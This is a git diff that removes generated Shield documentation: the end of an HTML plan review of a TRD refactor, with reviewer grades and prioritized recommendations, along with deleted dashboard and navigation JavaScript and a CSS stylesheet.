-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#verdict">Verdict</a>
-</li>
-<li><a href="#score-summary">Score Summary</a>
-</li>
-<li><a href="#p0-recommendations-block-implementation-start">P0 Recommendations (block implementation start)</a>
-</li>
-<li><a href="#p1-recommendations-should-land-in-implementation-milestone">P1 Recommendations (should land in implementation milestone)</a>
-</li>
-<li><a href="#p2-recommendations-nice-to-have">P2 Recommendations (nice to have)</a>
-</li>
-<li><a href="#cross-reviewer-convergence">Cross-reviewer convergence</a>
-</li>
-<li><a href="#detailed-agent-findings">Detailed Agent Findings</a>
-</li>
-<li><a href="#next-steps">Next steps</a>
-</li>
-</ul>
-</nav>
-<h1 id="plan-review-plan-trd-refactor">Plan Review: /plan TRD refactor</h1>
-<p><strong>Date:</strong> 2026-05-25
-<strong>Plan:</strong> <code>docs/shield/plan-trd-refactor-20260524/plan.json</code> (+ plan.md, plan-architecture.md)
-<strong>Reviewers:</strong> DX Engineer, Agile Coach, Architect, Backend Engineer, SRE
-<strong>Composite Score:</strong> <strong>B / Ready</strong> (with P0 fixes recommended before implementation)
-<strong>Composite numeric:</strong> 2.77 (weighted: Architect+DX+Backend = 1.0; Agile+SRE = 0.7)</p>
-<h2 id="verdict">Verdict</h2>
-<p>The plan is structurally <strong>ready</strong> — sprint-ready stories, testable ACs, milestone DAG is clean, schema design is well-reasoned, reversibility is documented. But three reviewers (SRE, Backend Engineer, Architect) surfaced <strong>6 P0 recommendations</strong> that should be addressed before implementation starts. The most consequential: the adapter work in <strong>EPIC-4-S3</strong> is materially larger than the plan implies (only 1 of 4 PM-tool adapters exists today as a <code>uv</code> package), and the eval is wired for one-shot PR-body capture rather than recurring CI gating.</p>
-<h2 id="score-summary">Score Summary</h2>
-<table>
-<thead>
-<tr>
-<th>Persona</th>
-<th>Grade</th>
-<th>Weight</th>
-<th>Numeric</th>
-<th>Key Finding</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Agile Coach</td>
-<td><strong>A-</strong></td>
-<td>0.7</td>
-<td>4</td>
-<td>Sprint-ready: 12/13 points A/A-, milestone DAG clean, all ACs testable</td>
-</tr>
-<tr>
-<td>DX Engineer</td>
-<td><strong>B+</strong></td>
-<td>1.0</td>
-<td>3</td>
-<td>Handoff/specification gaps: section_id heuristic, adapter paths, CI vs PR-body</td>
-</tr>
-<tr>
-<td>Architect</td>
-<td><strong>B</strong></td>
-<td>1.0</td>
-<td>3</td>
-<td>Edge-case completeness: stale &quot;13-section&quot; refs, off-by-N negatives, no stale-anchor detection</td>
-</tr>
-<tr>
-<td>SRE</td>
-<td><strong>C</strong></td>
-<td>0.7</td>
-<td>2</td>
-<td>Runtime safety net missing: no recurring CI gate, no rollback trigger, no provenance stamp</td>
-</tr>
-<tr>
-<td>Backend Engineer</td>
-<td><strong>C+</strong></td>
-<td>1.0</td>
-<td>2</td>
-<td>Adapter contract missing, idempotency undefined, 3 of 4 adapters don't exist as packages</td>
-</tr>
-</tbody>
-</table>
-<h2 id="p0-recommendations-block-implementation-start">P0 Recommendations (block implementation start)</h2>
-<p>These appear with <strong>convergent support across multiple reviewers</strong> — addressing them is the highest-leverage pre-implementation work.</p>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Recommendation</th>
-<th>Origin</th>
-<th>Affected story</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>P0-1</strong></td>
-<td><strong>Fix 14 vs 13 inconsistency across all artifacts.</strong> <code>plan-architecture.md</code> lines 25, 37, 75 still say &quot;13-section&quot;. EPIC-3-S3 AC says &quot;all 13 negatives&quot; but EPIC-3-S2 enumerates 16 negatives (14 missing-section + 1 drift + 1 vague-TBD). Pick a number and propagate everywhere.</td>
-<td>Architect P1 + Backend P0</td>
-<td>EPIC-3-S2, EPIC-3-S3; plan-architecture.md prose</td>
-</tr>
-<tr>
-<td><strong>P0-2</strong></td>
-<td><strong>Split EPIC-4-S3 or add adapter-scaffolding story.</strong> Only <code>shield/adapters/clickup/</code> exists as a <code>uv</code> package today; Jira/Confluence/Notion don't exist. Either split EPIC-4-S3 by adapter (S3a/b/c/d) or add an EPIC-4-S0 that scaffolds <code>pyproject.toml</code>, MCP-server skeleton, tests/, and a shared <code>shield/adapters/_common/design_refs.py</code> for the <code>DesignRef</code> dataclass and <code>forward_design_refs</code> protocol.</td>
-<td>Backend P0 (verified by repo inspection)</td>
-<td>EPIC-4-S3</td>
-</tr>
-<tr>
-<td><strong>P0-3</strong></td>
-<td><strong>Specify the adapter interface contract.</strong> Lock the function signature across all four adapters before implementation: <code>forward_design_refs(task_id: str, refs: list[DesignRef]) -&gt; ForwardResult</code> with <code>ForwardResult{created, skipped, errors}</code>. Each <code>DesignRef</code> produces a deterministic idempotency key (<code>sha256(story_id + anchor_url)[:32]</code>) used as <code>globalId</code> for Jira/Confluence remote-links.</td>
-<td>Backend P0</td>
-<td>EPIC-4-S3; new schema doc in <code>sidecar-schema.md</code></td>
-</tr>
-<tr>
-<td><strong>P0-4</strong></td>
-<td><strong>Add idempotency test fixture to EPIC-4-S3.</strong> Add an AC: &quot;Running <code>/pm-sync</code> twice in succession on the same plan produces the same remote state — no duplicate remote-links, no duplicate ClickUp custom-field writes, no duplicate Notion property writes.&quot; Primary regression guard for the most likely incident shape.</td>
-<td>Backend P0 + Architect P2 (<code>trd_sha</code>)</td>
-<td>EPIC-4-S3, EPIC-2-S2</td>
-</tr>
-<tr>
-<td><strong>P0-5</strong></td>
-<td><strong>Wire eval into recurring CI, not just one-shot PR body.</strong> EPIC-3-S3 says &quot;Wire eval into CI&quot; but the tasks only describe manual PR-body capture. Add a <code>.github/workflows/</code> step that runs <code>uv run shield/evals/run.py plan-trd</code> on every PR touching <code>shield/skills/general/plan-docs/**</code> or <code>shield/schema/**</code>. Without this, the next <code>plan-docs/SKILL.md</code> edit silently breaks the 14-section contract.</td>
-<td>SRE P0 + DX P1</td>
-<td>EPIC-3-S3</td>
-</tr>
-<tr>
-<td><strong>P0-6</strong></td>
-<td><strong>Define mixed-domain failure mode in EPIC-1-S2.</strong> &quot;Mixed → annotate per section&quot; is a single line with no worked example, no eval fixture, no AC. Realistic monorepos (Tesseract itself: <code>pyproject.toml</code> + <code>*.tf</code>) will hit this on day 1. Add: (a) a <code>positive-mixed/</code> fixture under <code>shield/evals/plan-trd/fixtures/</code>, (b) explicit guidance for what &quot;annotate per section&quot; emits, (c) a detection rule (presence of both infra and backend markers).</td>
-<td>SRE P0 + DX P1 + Architect P1 (3 reviewers)</td>
-<td>EPIC-1-S2, EPIC-3-S1</td>
-</tr>
-</tbody>
-</table>
-<h2 id="p1-recommendations-should-land-in-implementation-milestone">P1 Recommendations (should land in implementation milestone)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Recommendation</th>
-<th>Origin</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1-1</td>
-<td><strong>Define <code>section_id</code> heuristic in EPIC-2-S2.</strong> The phrase &quot;story title keyword → TRD section anchor&quot; is a hint, not an algorithm. Specify: &quot;lowercase fuzzy match story.name tokens against TRD section anchor slugs; fall back to §7 high-level-design if no token overlaps.&quot;</td>
-<td>DX P1</td>
-</tr>
-<tr>
-<td>P1-2</td>
-<td><strong>Define <code>design_refs[]</code> merge semantics in EPIC-2-S2.</strong> &quot;Preserved or updated in place&quot; is ambiguous. Specify: &quot;match by <code>(doc, section_id, component)</code> tuple; replace <code>label</code> if changed, never duplicate keys.&quot;</td>
-<td>DX P1</td>
-</tr>
-<tr>
-<td>P1-3</td>
-<td><strong>Name adapter file paths in EPIC-4-S3.</strong> Replace &quot;the relevant adapter logic (Python under shield/adapters/)&quot; with explicit per-tool file paths and the function/class to extend in each.</td>
-<td>DX P1 + Agile P2</td>
-</tr>
-<tr>
-<td>P1-4</td>
-<td><strong>Rename or rescope EPIC-3-S3.</strong> Story title says &quot;CI&quot; but tasks describe manual PR-body capture. Either add a workflow YAML task (with file path) or retitle to &quot;Eval execution + RED-GREEN paper trail&quot;.</td>
-<td>DX P1</td>
-</tr>
-<tr>
-<td>P1-5</td>
-<td><strong>Reconcile domain-detection source.</strong> <code>plan.json</code> EPIC-1-S2 description says &quot;detects the dominant domain from .shield.json + repo markers&quot;; <code>plan.md</code> says only &quot;repo markers&quot;. Pick one and document the config key if <code>.shield.json</code> is in.</td>
-<td>DX P1</td>
-</tr>
-<tr>
-<td>P1-6</td>
-<td><strong>Add stale-anchor detection to /plan-review.</strong> When a story's <code>design_refs[].anchor_url</code> points at a <code>#section-id</code> no longer present in the live <code>trd.md</code>, <code>/plan-review</code> should report it as a Critical finding. Otherwise sidecar→doc drift goes undetected.</td>
-<td>Architect P1</td>
-</tr>
-<tr>
-<td>P1-7</td>
-<td><strong>Add JSON Schema validator story.</strong> Two version bumps (1.1→1.2→1.3) in one PR series without a machine-readable validator is the drift inflection. Add <code>shield/scripts/validate_plan.py</code> using <code>pydantic</code> or <code>jsonschema</code>. Invoked by <code>/plan-review</code> and the eval runner.</td>
-<td>Backend P1</td>
-</tr>
-<tr>
-<td>P1-8</td>
-<td><strong>Specify observability shape for adapter forwarding.</strong> Each <code>design_refs[]</code> forward emits one <code>action_log</code> entry with <code>action='forward_design_ref'</code>, fields <code>{story_id, adapter, anchor_url, outcome, idempotency_key}</code>. Failures emit <code>forward_design_ref_failed</code> with <code>{error_class, http_status}</code>.</td>
-<td>Backend P1</td>
-</tr>
-<tr>
-<td>P1-9</td>
-<td><strong>Add deprecation overlap for <code>output-paths.yaml</code>.</strong> Keep <code>plan_arch_md</code> / <code>plan_arch_html</code> keys with <code>deprecated: true</code> rather than removing in M1. Remove in M3 or follow-up PR to protect external consumers of the contract.</td>
-<td>Backend P1</td>
-</tr>
-<tr>
-<td>P1-10</td>
-<td><strong>Add provenance stamp on emitted TRDs.</strong> Top-of-file comment: <code>&lt;!-- generated by /plan vX.Y.Z on YYYY-MM-DD --&gt;</code>. Pairs with <code>last_aligned_with</code> for full drift accountability.</td>
-<td>SRE P1</td>
-</tr>
-<tr>
-<td>P1-11</td>
-<td><strong>Add rollback-trigger statement.</strong> Plan-architecture.md §Rollback should name observable signals that trigger a revert: e.g., (a) eval fails on positive fixtures after merge, (b) &gt;N user-reported broken <code>/plan</code> runs within 48h, (c) downstream <code>/pm-sync</code> adapter errors trace back to schema 1.2.</td>
-<td>SRE P1</td>
-</tr>
-<tr>
-<td>P1-12</td>
-<td><strong>Add version-bump task per CLAUDE.md mandate.</strong> Bump <code>.claude-plugin/marketplace.json</code> and <code>pyproject.toml</code> per the &quot;When updating any plugin, bump its version in both...in the same commit&quot; rule. Currently absent from every story.</td>
-<td>SRE P1 + DX P2</td>
-</tr>
-<tr>
-<td>P1-13</td>
-<td><strong>Add tool-and-access requirements subsection.</strong> Which Confluence/Jira/ClickUp/Notion test tenants (or mock client expectations), where credentials live (<code>.shield.json</code>? env vars?), which Python deps the eval pulls.</td>
-<td>DX P1</td>
-</tr>
-<tr>
-<td>P1-14</td>
-<td><strong>Specify atomic write for <code>/plan</code> output.</strong> If <code>/plan</code> cannot write <code>trd.md</code> (disk error, partial write, missing template), it must not leave a corrupted file behind — write atomically (temp file + rename) or fail loudly with the partial file removed.</td>
-<td>SRE P1</td>
-</tr>
-<tr>
-<td>P1-15</td>
-<td><strong>Specify forward-compat policy in <code>sidecar-schema.md</code>.</strong> How does <code>/plan-review</code> handle <code>version: &quot;1.4&quot;</code> from a future Shield? Reject, warn, or accept-with-ignored-fields?</td>
-<td>Backend P1</td>
-</tr>
-</tbody>
-</table>
-<h2 id="p2-recommendations-nice-to-have">P2 Recommendations (nice to have)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Recommendation</th>
-<th>Origin</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P2-1</td>
-<td>Split EPIC-3-S2 into &quot;negative-fixture generator + 14 missing-section fixtures&quot; and &quot;drift + vague-TBD fixtures&quot; for tighter sizing</td>
-<td>Agile P2</td>
-</tr>
-<tr>
-<td>P2-2</td>
-<td>Add CHANGELOG entry / migration-note AC for the cutover</td>
-<td>Agile P2</td>
-</tr>
-<tr>
-<td>P2-3</td>
-<td>Make intra-milestone story <code>depends_on</code> explicit in plan.json</td>
-<td>Agile P2</td>
-</tr>
-<tr>
-<td>P2-4</td>
-<td>Lock the eval runner invocation (drop &quot;or equivalent existing eval runner&quot;)</td>
-<td>DX P2</td>
-</tr>
-<tr>
-<td>P2-5</td>
-<td>Pick YAML or JSON for the slug allow-list sidecar</td>
-<td>DX P2</td>
-</tr>
-<tr>
-<td>P2-6</td>
-<td>Add inline <code>design_refs[]</code> JSON example in EPIC-2-S1</td>
-<td>DX P2</td>
-</tr>
-<tr>
-<td>P2-7</td>
-<td>Add AC for <code>/pm-sync</code> partial-failure behavior (1 of 4 adapters errors)</td>
-<td>DX P2</td>
-</tr>
-<tr>
-<td>P2-8</td>
-<td>Add &quot;local development&quot; how-to-run note in plan-architecture.md</td>
-<td>DX P2</td>
-</tr>
-<tr>
-<td>P2-9</td>
-<td>Defend or parameterize magic numbers (&gt;80 char overlap, &gt;20 line code block)</td>
-<td>Architect P2</td>
-</tr>
-<tr>
-<td>P2-10</td>
-<td>Add <code>trd_sha</code> content hash alongside <code>last_aligned_with</code> for true undead-doc detection</td>
-<td>Architect P2</td>
-</tr>
-<tr>
-<td>P2-11</td>
-<td>Add TRD <code>template_version</code> field for legitimate template evolution</td>
-<td>Architect P2</td>
-</tr>
-<tr>
-<td>P2-12</td>
-<td>Add round-trip integration eval (<code>/plan</code> output → <code>/plan-review</code> says no Criticals)</td>
-<td>Architect P2</td>
-</tr>
-<tr>
-<td>P2-13</td>
-<td>Add <code>--dry-run</code> mode for <code>/plan</code> so users validate locally before committing</td>
-<td>SRE P2</td>
-</tr>
-<tr>
-<td>P2-14</td>
-<td>Add a one-page troubleshooting block (<code>plan-troubleshooting.md</code>)</td>
-<td>SRE P2</td>
-</tr>
-<tr>
-<td>P2-15</td>
-<td>Add eval fixture for M2 running on pre-M1 <code>plan-architecture.md</code>-only folders</td>
-<td>SRE P2</td>
-</tr>
-<tr>
-<td>P2-16</td>
-<td>Concurrent <code>/pm-sync</code> note (single-writer until idempotency-key lands)</td>
-<td>Backend P2</td>
-</tr>
-<tr>
-<td>P2-17</td>
-<td>Rate-limit handling note per existing adapter posture</td>
-<td>Backend P2</td>
-</tr>
-<tr>
-<td>P2-18</td>
-<td>Decide fate of this plan's own <code>plan-architecture.md</code> post-M1 (rename or freeze)</td>
-<td>Backend P2</td>
-</tr>
-</tbody>
-</table>
-<h2 id="cross-reviewer-convergence">Cross-reviewer convergence</h2>
-<p>The strongest signal is <strong>convergent flagging</strong> — recommendations cited by 2+ reviewers:</p>
-<table>
-<thead>
-<tr>
-<th>Theme</th>
-<th>Reviewers</th>
-<th>Severity</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Mixed-domain handling (EPIC-1-S2)</td>
-<td>DX, SRE, Architect (3)</td>
-<td>P0</td>
-</tr>
-<tr>
-<td>14 vs 13 inconsistency</td>
-<td>Architect, Backend (2)</td>
-<td>P0</td>
-</tr>
-<tr>
-<td>EPIC-4-S3 adapter file paths</td>
-<td>DX, Agile, Backend (3)</td>
-<td>P0 (escalated)</td>
-</tr>
-<tr>
-<td>CI wiring vs PR-body capture</td>
-<td>DX, SRE (2)</td>
-<td>P0</td>
-</tr>
-<tr>
-<td>Version-bump discipline</td>
-<td>DX, SRE (2)</td>
-<td>P1</td>
-</tr>
-<tr>
-<td>Idempotency / re-run safety</td>
-<td>Architect, Backend (2)</td>
-<td>P0</td>
-</tr>
-</tbody>
-</table>
-<h2 id="detailed-agent-findings">Detailed Agent Findings</h2>
-<ul>
-<li><a href="../../../../reviews/plan/2026-05-25/detailed/agile-coach.md">Agile Coach</a> — A-, sprint-readiness focus</li>
-<li><a href="../../../../reviews/plan/2026-05-25/detailed/dx-engineer.md">DX Engineer</a> — B+, handoff/specification gaps</li>
-<li><a href="../../../../reviews/plan/2026-05-25/detailed/architect.md">Architect</a> — B, topology + edge-case completeness</li>
-<li><a href="../../../../reviews/plan/2026-05-25/detailed/backend-engineer.md">Backend Engineer</a> — C+, adapter contract + repo-grounded findings</li>
-<li><a href="../../../../reviews/plan/2026-05-25/detailed/sre.md">SRE</a> — C, runtime safety net</li>
-</ul>
-<h2 id="next-steps">Next steps</h2>
-<ol>
-<li>Apply the <strong>enhanced plan</strong> (<a href="../../../../reviews/plan/2026-05-25/enhanced-plan.md">enhanced-plan.md</a>) which carries the P0 fixes and most P1 recommendations</li>
-<li>After applying, re-run <code>/plan-review</code> to confirm composite moves above 3.0 (target: B+/Ready-clean)</li>
-<li>Then <code>/pm-sync</code> to push the updated stories</li>
-<li>Then <code>/implement</code> starting with EPIC-3-S1 (positive eval fixtures) per the RED → GREEN trail</li>
-</ol>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/shield-dashboard.js b/docs/shield/shield-dashboard.js
deleted file mode 100644
index 727f693b..00000000
--- a/docs/shield/shield-dashboard.js
+++ /dev/null
@@ -1,62 +0,0 @@
-// Builds the dashboard card grid + pipeline strip from window.SHIELD_MANIFEST.
-// index.html sits at docs/shield root, so root prefix is "".
-(function () {
-  function el(tag, cls, html) {
-    var e = document.createElement(tag);
-    if (cls) e.className = cls;
-    if (html != null) e.innerHTML = html;
-    return e;
-  }
-  var LINKS = [
-    ["research", "Research", "research.html"],
-    ["prd", "PRD", "prd.html"],
-    ["trd", "TRD", "trd.html"],
-    ["plan_md", "Plan", "plan.html"],
-  ];
-  var PIPELINE = [
-    ["Research", function (a) { return a.research; }],
-    ["PRD", function (a) { return a.prd; }],
-    ["Plan", function (a) { return a.plan_md || a.plan_json; }],
-    ["Implement", function (a, f) { return (f.reviews && f.reviews.code && f.reviews.code.count) > 0; }],
-  ];
-  function card(f) {
-    var c = el("div", "dash-card");
-    var head = el("div");
-    head.appendChild(el("h3", null, f.name));
-    head.appendChild(el("span", "date", f.updated ? f.updated.slice(0, 10) : ""));
-    c.appendChild(head);
-    var pipe = el("div", "pipeline");
-    PIPELINE.forEach(function (p) {
-      var done = !!p[1](f.artifacts || {}, f);
-      pipe.appendChild(el("span", "pipe-step" + (done ? " done" : ""), p[0]));
-    });
-    c.appendChild(pipe);
-    var links = el("div", "dash-links");
-    LINKS.forEach(function (l) {
-      if (f.artifacts && f.artifacts[l[0]]) {
-        var a = el("a", null, l[1]);
-        a.setAttribute("href", f.name + "/outputs/" + l[2]);
-        links.appendChild(a);
-      }
-    });
-    if (f.artifacts && f.artifacts.plan_json) {
-      var aj = el("a", null, "Sidecar JSON");
-      aj.setAttribute("href", f.name + "/plan.json");
-      links.appendChild(aj);
-    }
-    c.appendChild(links);
-    return c;
-  }
-  document.addEventListener("DOMContentLoaded", function () {
-    var mount = document.getElementById("shield-dashboard");
-    if (!mount) return;
-    var features = (window.SHIELD_MANIFEST && window.SHIELD_MANIFEST.features) || [];
-    if (!features.length) {
-      mount.appendChild(el("div", "dash-empty", "No features yet — run /research or /plan to get started."));
-      return;
-    }
-    var grid = el("div", "dash-grid");
-    features.forEach(function (f) { grid.appendChild(card(f)); });
-    mount.appendChild(grid);
-  });
-})();
diff --git a/docs/shield/shield-nav.js b/docs/shield/shield-nav.js
deleted file mode 100644
index 78095491..00000000
--- a/docs/shield/shield-nav.js
+++ /dev/null
@@ -1,160 +0,0 @@
-// Header breadcrumb + filterable Features panel, built from window.SHIELD_MANIFEST.
-// Pure logic (crumbModel, filterFeatures, titleize) is separated from DOM
-// rendering and exported for unit tests (node:test). The DOM bootstrap is
-// guarded by `typeof document`, so requiring this file in Node is safe.
-// No fetch — data comes from manifest.js. file:// safe.
-(function () {
-  var FILE_LABELS = {
-    "prd.html": "PRD", "trd.html": "TRD", "plan.html": "Plan",
-    "research.html": "Research", "plan-architecture.html": "Architecture",
-    "summary.html": "Review", "enhanced-prd.html": "Enhanced PRD",
-    "enhanced-plan.html": "Enhanced Plan", "index.html": "Dashboard",
-  };
-  // artifact key -> [label, path-within-feature, tag]
-  var ARTIFACTS = [
-    ["research", "Research", "outputs/research.html", "research"],
-    ["prd", "PRD", "outputs/prd.html", "prd"],
-    ["trd", "TRD", "outputs/trd.html", "trd"],
-    ["plan_md", "Plan", "outputs/plan.html", "plan"],
-    ["plan_arch_md", "Architecture", "outputs/plan-architecture.html", "arch"],
-    ["plan_json", "Sidecar JSON", "plan.json", "json"],
-  ];
-
-  function titleize(file) {
-    return file.replace(/\.html$/, "").replace(/[-_]/g, " ")
-      .replace(/\b\w/g, function (c) { return c.toUpperCase(); });
-  }
-
-  // Breadcrumb model from a URL path + the page's root prefix.
-  // Returns [{label, href|null, active}].
-  function crumbModel(pathname, root) {
-    var parts = decodeURIComponent(pathname).split("/").filter(Boolean);
-    var file = parts[parts.length - 1] || "index.html";
-    var oi = parts.lastIndexOf("outputs");
-    if (file === "index.html" || oi <= 0) {
-      return [{ label: "Dashboard", href: null, active: true }];
-    }
-    var crumb = [{ label: "Dashboard", href: root + "index.html", active: false }];
-    crumb.push({ label: parts[oi - 1], href: null, active: false });
-    var ri = parts.lastIndexOf("reviews");
-    if (ri !== -1 && ri > oi) {
-      crumb.push({ label: (parts[ri + 1] || "") + " review · " + (parts[ri + 2] || ""), href: null, active: true });
-    } else {
-      crumb.push({ label: FILE_LABELS[file] || titleize(file), href: null, active: true });
-    }
-    return crumb;
-  }
-
-  // Filtered, grouped feature model from the manifest + a search query.
-  // Returns [{name, docs:[{label,href,tag}], reviews:[{label,href}]}].
-  function filterFeatures(manifest, query, root) {
-    var features = (manifest && manifest.features) || [];
-    var q = (query || "").trim().toLowerCase();
-    var out = [];
-    features.forEach(function (f) {
-      var fm = f.name.toLowerCase().indexOf(q) !== -1;
-      var docs = [];
-      ARTIFACTS.forEach(function (a) {
-        if (f.artifacts && f.artifacts[a[0]] && (!q || fm || a[1].toLowerCase().indexOf(q) !== -1)) {
-          docs.push({ label: a[1], href: root + f.name + "/" + a[2], tag: a[3] });
-        }
-      });
-      var reviews = [];
-      ["prd", "plan", "code"].forEach(function (rt) {
-        var rv = f.reviews && f.reviews[rt];
-        if (rv && rv.entries) {
-          rv.entries.forEach(function (en) {
-            var label = rt + " review · " + en.date;
-            if (!q || fm || label.toLowerCase().indexOf(q) !== -1) {
-              reviews.push({ label: label, href: root + en.path });
-            }
-          });
-        }
-      });
-      if (docs.length || reviews.length) out.push({ name: f.name, docs: docs, reviews: reviews });
-    });
-    return out;
-  }
-
-  // Export pure logic for unit tests (Node). Browsers load this as a classic
-  // script where `module` is undefined, so this branch is a no-op there.
-  if (typeof module !== "undefined" && module.exports) {
-    module.exports = { crumbModel: crumbModel, filterFeatures: filterFeatures, titleize: titleize };
-  }
-
-  // Below here is browser-only DOM wiring.
-  if (typeof document === "undefined") return;
-
-  function el(tag, cls, html) {
-    var e = document.createElement(tag);
-    if (cls) e.className = cls;
-    if (html != null) e.innerHTML = html;
-    return e;
-  }
-
-  function renderCrumb(model) {
-    var crumb = document.getElementById("shield-crumb");
-    if (!crumb) return;
-    crumb.innerHTML = "";
-    model.forEach(function (seg, i) {
-      if (i) crumb.appendChild(el("span", "chev", "›"));
-      if (seg.href) {
-        var a = el("a", seg.active ? "here" : null, seg.label);
-        a.setAttribute("href", seg.href);
-        crumb.appendChild(a);
-      } else {
-        crumb.appendChild(el("span", seg.active ? "here" : null, seg.label));
-      }
-    });
-  }
-
-  function renderResults(model, container) {
-    container.innerHTML = "";
-    if (!model.length) { container.appendChild(el("div", "docs-empty", "No docs match")); return; }
-    model.forEach(function (f) {
-      container.appendChild(el("div", "feat-name", f.name));
-      f.docs.forEach(function (d) {
-        var a = el("a", "doc", d.label + '<span class="tag">' + d.tag + "</span>");
-        a.setAttribute("href", d.href);
-        container.appendChild(a);
-      });
-      f.reviews.forEach(function (r) {
-        var a = el("a", "doc rev", "↳ " + r.label);
-        a.setAttribute("href", r.href);
-        container.appendChild(a);
-      });
-    });
-  }
-
-  document.addEventListener("DOMContentLoaded", function () {
-    var root = document.body.dataset.shieldRoot || "";
-    renderCrumb(crumbModel(location.pathname, root));
-
-    var btn = document.getElementById("docs-toggle");
-    var panel = document.getElementById("docs-panel");
-    var search = document.getElementById("docs-search");
-    var results = document.getElementById("docs-results");
-    if (!btn || !panel || !search || !results) return;
-
-    function paint() { renderResults(filterFeatures(window.SHIELD_MANIFEST, search.value, root), results); }
-    function open() {
-      panel.classList.add("open"); btn.setAttribute("aria-expanded", "true");
-      search.value = ""; paint(); search.focus();
-    }
-    function close() { panel.classList.remove("open"); btn.setAttribute("aria-expanded", "false"); }
-
-    btn.addEventListener("click", function (e) {
-      e.stopPropagation();
-      panel.classList.contains("open") ? close() : open();
-    });
-    search.addEventListener("input", paint);
-    search.addEventListener("click", function (e) { e.stopPropagation(); });
-    document.addEventListener("keydown", function (e) {
-      if (e.key === "Escape") close();
-      if ((e.metaKey || e.ctrlKey) && e.key.toLowerCase() === "k") { e.preventDefault(); open(); }
-    });
-    document.addEventListener("click", function (e) {
-      if (!e.target.closest(".feat-wrap")) close();
-    });
-  });
-})();
diff --git a/docs/shield/shield.css b/docs/shield/shield.css
deleted file mode 100644
index 6ea3b4bf..00000000
--- a/docs/shield/shield.css
+++ /dev/null
@@ -1,81 +0,0 @@
-:root {
-  --accent:#1a73e8; --bg:#ffffff; --panel:#f7f9fc; --text:#1f1f1f;
-  --muted:#5a6370; --border:#e4e8ee; --green:#3fb950; --green-bg:#e9f7ee;
-}
-* { box-sizing:border-box; }
-body { margin:0; font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",system-ui,sans-serif;
-  line-height:1.6; color:var(--text); background:var(--bg); }
-/* Header — breadcrumb + Features panel */
-.shield-header { display:flex; align-items:center; gap:12px; padding:10px 18px;
-  border-bottom:1px solid var(--border); background:#fff; position:sticky; top:0; z-index:50; font-size:.92rem; }
-.shield-header .brand { font-weight:700; color:var(--text); text-decoration:none; white-space:nowrap; }
-.shield-header .bar-sep { color:#9aa3af; }
-.crumb { color:var(--muted); white-space:nowrap; overflow:hidden; text-overflow:ellipsis; }
-.crumb a { color:var(--muted); text-decoration:none; }
-.crumb a:hover { color:var(--accent); }
-.crumb .chev { color:#c2c8d0; margin:0 5px; }
-.crumb .here { color:var(--accent); font-weight:600; }
-.bar-spacer { flex:1; }
-.feat-wrap { position:relative; }
-.feat-btn { cursor:pointer; border:1px solid var(--border); background:var(--panel);
-  color:var(--accent); border-radius:6px; padding:5px 12px; font-size:.92rem; white-space:nowrap; }
-.feat-btn:hover { border-color:var(--accent); }
-.feat-panel { display:none; position:absolute; right:0; top:115%; width:330px; background:#fff;
-  border:1px solid var(--border); border-radius:10px; box-shadow:0 10px 30px rgba(0,0,0,.12);
-  padding:10px; max-height:74vh; overflow:auto; }
-.feat-panel.open { display:block; }
-.docs-search { width:100%; border:1px solid var(--border); border-radius:7px; padding:8px 10px;
-  font-size:.85rem; outline:none; }
-.docs-search:focus { border-color:var(--accent); }
-.feat-name { font-weight:600; font-size:.82rem; margin:10px 4px 2px; color:var(--text); }
-.doc { display:flex; align-items:center; gap:8px; padding:5px 8px 5px 14px; border-radius:6px;
-  color:var(--accent); text-decoration:none; font-size:.85rem; }
-.doc:hover { background:var(--panel); }
-.doc .tag { margin-left:auto; font-size:.62rem; color:var(--muted); background:var(--panel);
-  border:1px solid var(--border); border-radius:10px; padding:0 6px; text-transform:uppercase; }
-.doc.rev { color:var(--muted); padding-left:22px; }
-.docs-empty { color:var(--muted); font-size:.8rem; padding:8px 6px; }
-/* Main content */
-.shield-main { max-width:960px; margin:0 auto; padding:36px 28px 96px; }
-h1,h2,h3,h4 { color:var(--accent); line-height:1.25; }
-h1 { font-size:2rem; border-bottom:2px solid var(--accent); padding-bottom:8px; margin-bottom:24px; }
-h2 { font-size:1.45rem; margin-top:40px; padding-top:12px; border-top:1px solid var(--border); }
-h3 { font-size:1.15rem; margin-top:28px; }
-h4 { font-size:1rem; color:var(--text); margin-top:20px; }
-p,ul,ol { margin:12px 0; } li { margin:4px 0; }
-table { border-collapse:collapse; width:100%; margin:16px 0; font-size:.94rem; }
-th,td { padding:8px 12px; border:1px solid var(--border); text-align:left; vertical-align:top; }
-th { background:var(--panel); font-weight:600; }
-tr:nth-child(even) td { background:#fbfcfd; }
-blockquote { border-left:3px solid var(--accent); margin:16px 0; padding:4px 16px;
-  color:var(--muted); background:var(--panel); }
-code { background:#f1f3f6; padding:2px 6px; border-radius:3px;
-  font-family:"JetBrains Mono","SF Mono",Consolas,monospace; font-size:.9em; }
-pre { background:var(--panel); padding:12px 16px; border-radius:6px; overflow-x:auto;
-  border:1px solid var(--border); }
-pre.mermaid { background:transparent; border:none; padding:0; text-align:center; }
-a { color:var(--accent); }
-hr { border:none; border-top:1px solid var(--border); margin:32px 0; }
-.toc,.meta-banner { background:var(--panel); border:1px solid var(--border);
-  border-left:3px solid var(--accent); border-radius:6px; padding:16px 20px; margin-bottom:28px; font-size:.94rem; }
-.toc-title { font-weight:600; margin-bottom:6px; }
-.shield-footer { max-width:960px; margin:0 auto; padding:24px 28px; color:var(--muted);
-  font-size:.85rem; border-top:1px solid var(--border); }
-/* Dashboard */
-.dash-grid { display:grid; grid-template-columns:repeat(auto-fill,minmax(280px,1fr)); gap:16px; }
-.dash-card { border:1px solid var(--border); border-radius:8px; padding:16px; background:#fff; }
-.dash-card h3 { margin:0 0 4px; color:var(--text); font-size:1.05rem; }
-.dash-card .date { color:var(--muted); font-size:.8rem; }
-.dash-links { display:flex; flex-wrap:wrap; gap:8px; margin-top:10px; }
